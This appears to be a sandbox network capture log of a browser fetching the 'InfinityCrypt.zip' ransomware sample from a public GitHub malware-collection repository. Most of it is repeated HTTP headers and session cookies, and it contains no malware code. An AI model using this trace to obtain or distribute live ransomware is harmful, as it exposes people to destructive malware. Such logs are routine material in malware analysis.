x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 845
x-github-request-id: D4B6:391246:133EDA:186A8C:679BF74B
-
Remote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/tree-commit-info/master/ransomwares HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/json
accept: application/json
x-requested-with: XMLHttpRequest
github-verified-fetch: true
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=tImOL78wqoEgdzzZBVFP5KqaHRXDm%2FbZbfTtQv8g7E%2BHqxXUZDncTJBFY9XJIvWKundiD9hCEElmOBQ41L925%2Bt5WTxiMjcjfG9N18qyefTjb8IogQHFNizOxTlGKbeZPaqrdqh%2FR6gdeeYTpXAMgteT5sSm4iUSM3UrPRJLV%2FL%2FUX%2BavYBr6q4lVGQfd0J0%2B7zGwWy%2BeZl%2F3sgAsoYLdEl1EbVlSAl2KMeYx9l3kBBAxqnU1PVt3DSUEaPsHKEvXxDooghIQmAKqU6QkjNDbQ%3D%3D--6Rf544if7wSThxsB--fA93gUtmYmU9Q%2BJEk5p4eQ%3D%3D
cookie: _octo=GH1.1.354131530.1738274631
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
date: Thu, 30 Jan 2025 22:03:55 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"97528c517ff2a1874ec155f6281f47f6"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 441
x-github-request-id: D4B6:391246:133EDA:186A8B:679BF74A
-
Remote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/deferred-metadata/master/ransomwares HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/json
accept: application/json
x-requested-with: XMLHttpRequest
github-verified-fetch: true
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=tImOL78wqoEgdzzZBVFP5KqaHRXDm%2FbZbfTtQv8g7E%2BHqxXUZDncTJBFY9XJIvWKundiD9hCEElmOBQ41L925%2Bt5WTxiMjcjfG9N18qyefTjb8IogQHFNizOxTlGKbeZPaqrdqh%2FR6gdeeYTpXAMgteT5sSm4iUSM3UrPRJLV%2FL%2FUX%2BavYBr6q4lVGQfd0J0%2B7zGwWy%2BeZl%2F3sgAsoYLdEl1EbVlSAl2KMeYx9l3kBBAxqnU1PVt3DSUEaPsHKEvXxDooghIQmAKqU6QkjNDbQ%3D%3D--6Rf544if7wSThxsB--fA93gUtmYmU9Q%2BJEk5p4eQ%3D%3D
cookie: _octo=GH1.1.354131530.1738274631
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
date: Thu, 30 Jan 2025 22:03:55 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"e61453a6d8b82727dfe87839b3fc469c"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 177
x-github-request-id: D4B6:391246:133EDA:186A8D:679BF74B
-
GEThttps://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zipmsedge.exeRemote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zip HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: application/json
x-requested-with: XMLHttpRequest
x-react-router: json
x-github-target: dotcom
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zip
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=tImOL78wqoEgdzzZBVFP5KqaHRXDm%2FbZbfTtQv8g7E%2BHqxXUZDncTJBFY9XJIvWKundiD9hCEElmOBQ41L925%2Bt5WTxiMjcjfG9N18qyefTjb8IogQHFNizOxTlGKbeZPaqrdqh%2FR6gdeeYTpXAMgteT5sSm4iUSM3UrPRJLV%2FL%2FUX%2BavYBr6q4lVGQfd0J0%2B7zGwWy%2BeZl%2F3sgAsoYLdEl1EbVlSAl2KMeYx9l3kBBAxqnU1PVt3DSUEaPsHKEvXxDooghIQmAKqU6QkjNDbQ%3D%3D--6Rf544if7wSThxsB--fA93gUtmYmU9Q%2BJEk5p4eQ%3D%3D
cookie: _octo=GH1.1.354131530.1738274631
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
date: Thu, 30 Jan 2025 22:04:08 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"446d5e24f36959de6de85afa605a5972"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 1948
x-github-request-id: D4B6:391246:1345E3:18735C:679BF74B
-
GEThttps://github.com/Endermanch/MalwareDatabase/latest-commit/master/ransomwares/InfinityCrypt.zipmsedge.exeRemote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/latest-commit/master/ransomwares/InfinityCrypt.zip HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/json
accept: application/json
x-requested-with: XMLHttpRequest
github-verified-fetch: true
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zip
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=tImOL78wqoEgdzzZBVFP5KqaHRXDm%2FbZbfTtQv8g7E%2BHqxXUZDncTJBFY9XJIvWKundiD9hCEElmOBQ41L925%2Bt5WTxiMjcjfG9N18qyefTjb8IogQHFNizOxTlGKbeZPaqrdqh%2FR6gdeeYTpXAMgteT5sSm4iUSM3UrPRJLV%2FL%2FUX%2BavYBr6q4lVGQfd0J0%2B7zGwWy%2BeZl%2F3sgAsoYLdEl1EbVlSAl2KMeYx9l3kBBAxqnU1PVt3DSUEaPsHKEvXxDooghIQmAKqU6QkjNDbQ%3D%3D--6Rf544if7wSThxsB--fA93gUtmYmU9Q%2BJEk5p4eQ%3D%3D
cookie: _octo=GH1.1.354131530.1738274631
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
date: Thu, 30 Jan 2025 22:04:09 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"9090ba4bfc48226fcbbae06699613aa1"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 452
x-github-request-id: D4B6:391246:13460D:18738E:679BF758
-
GEThttps://github.com/Endermanch/MalwareDatabase/deferred-metadata/master/ransomwares/InfinityCrypt.zipmsedge.exeRemote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/deferred-metadata/master/ransomwares/InfinityCrypt.zip HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/json
accept: application/json
x-requested-with: XMLHttpRequest
github-verified-fetch: true
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zip
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=tImOL78wqoEgdzzZBVFP5KqaHRXDm%2FbZbfTtQv8g7E%2BHqxXUZDncTJBFY9XJIvWKundiD9hCEElmOBQ41L925%2Bt5WTxiMjcjfG9N18qyefTjb8IogQHFNizOxTlGKbeZPaqrdqh%2FR6gdeeYTpXAMgteT5sSm4iUSM3UrPRJLV%2FL%2FUX%2BavYBr6q4lVGQfd0J0%2B7zGwWy%2BeZl%2F3sgAsoYLdEl1EbVlSAl2KMeYx9l3kBBAxqnU1PVt3DSUEaPsHKEvXxDooghIQmAKqU6QkjNDbQ%3D%3D--6Rf544if7wSThxsB--fA93gUtmYmU9Q%2BJEk5p4eQ%3D%3D
cookie: _octo=GH1.1.354131530.1738274631
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
date: Thu, 30 Jan 2025 22:04:09 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"e61453a6d8b82727dfe87839b3fc469c"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 177
x-github-request-id: D4B6:391246:13460D:18738F:679BF759
-
GEThttps://github.com/Endermanch/MalwareDatabase/raw/refs/heads/master/ransomwares/InfinityCrypt.zipmsedge.exeRemote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/raw/refs/heads/master/ransomwares/InfinityCrypt.zip HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zip
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=tImOL78wqoEgdzzZBVFP5KqaHRXDm%2FbZbfTtQv8g7E%2BHqxXUZDncTJBFY9XJIvWKundiD9hCEElmOBQ41L925%2Bt5WTxiMjcjfG9N18qyefTjb8IogQHFNizOxTlGKbeZPaqrdqh%2FR6gdeeYTpXAMgteT5sSm4iUSM3UrPRJLV%2FL%2FUX%2BavYBr6q4lVGQfd0J0%2B7zGwWy%2BeZl%2F3sgAsoYLdEl1EbVlSAl2KMeYx9l3kBBAxqnU1PVt3DSUEaPsHKEvXxDooghIQmAKqU6QkjNDbQ%3D%3D--6Rf544if7wSThxsB--fA93gUtmYmU9Q%2BJEk5p4eQ%3D%3D
cookie: _octo=GH1.1.354131530.1738274631
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
